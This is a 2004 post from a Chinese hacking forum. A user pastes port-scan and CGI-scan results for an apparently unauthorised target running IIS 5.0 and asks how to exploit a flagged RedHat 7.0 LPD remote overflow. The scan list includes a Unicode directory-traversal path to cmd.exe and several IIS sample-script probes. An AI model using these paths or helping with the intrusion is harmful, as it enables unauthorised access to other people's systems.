黑色海岸线论坛 - Powered by Discuz! Board

标题: 请教此机入侵方法之2！ [打印本页]

作者: ucan 时间: 2004-4-18 22:05 标题: 请教此机入侵方法之2！

端口扫描

21(FTP Control)
80(HTTP)
25(SMTP)
119(NNTP)
53(BIND)
515(LPD) (RedHat 7.0 LPD 存在远程溢出 )
389(LDAP)

--------------------------------------------------------------------------------
CGI扫描

WEB版本信息: Microsoft-IIS/5.0

扫描成功CGI漏洞
/scripts/samples/search/queryhit.idq (HTTP: 200 )
/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe (HTTP: 200 )
/iissamples/exair/search/qfullhit.htw (HTTP: 200 )
/iissamples/issamples/query.idq (HTTP: 200 )
/iissamples/issamples/oop/qsumrhit.htw (HTTP: 200 )
/iissamples/issamples/fastq.idq (HTTP: 200 )
/iishelp/iis/misc/iirturnh.htw (HTTP: 200 )
/iissamples/exair/search/qsumrhit.htw (HTTP: 200 )
/iissamples/issamples/oop/qfullhit.htw (HTTP: 200 )
/iissamples/exair/search/query.idq (HTTP: 200 )
/blabla.idq (HTTP: 200 )
/*.idq (HTTP: 200 )
/*.ida (HTTP: 200 )
/?PageServices (HTTP: 200 )
流光显示“RedHat 7.0 LPD 存在远程溢出”为红色，一定有搞头，可惜没用过这系统，求教！

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)